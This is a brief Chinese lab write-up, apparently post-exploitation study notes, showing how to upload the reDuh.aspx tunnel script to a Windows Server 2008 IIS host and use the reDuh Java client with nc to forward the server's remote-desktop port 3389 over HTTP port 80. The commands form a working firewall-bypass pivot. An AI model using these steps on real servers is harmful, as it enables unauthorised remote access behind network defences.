我们都知道一个端口只能为一个程序服务,如果两个程序用一个端口就会出现端口占用的情况,reduh这个工具就打破了这种规则,它可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。也就是在不用关闭网站的情况下80端口可以两个程序共用
实验环境:
- reDuh-master
- Windows Server 2008 R2 x64
- IIS服务器
- 瑞士军刀nc
环境搭建:
win2008开启防火墙与远程桌面
将lreDuh.aspx文件上传到win2008中
然后看浏览器中是否能访问到
模拟实验:
进入reduh的目录E:\学习资料\后渗透\03.17\reDuh-master\reDuhClient\dist中输入java -jar reDuhClient.jar http://192.168.70.128/reDuh.aspx
然后再打开一个终端进入到nc所在目录输入nc.exe -nvv 127.0.0.1 1010
出现交互框然后输入[createTunnel]6666:127.0.0.1:3389
这时连接本地6666端口就可以连接到win2008的远程桌面,但是这个方法速度奇慢无比
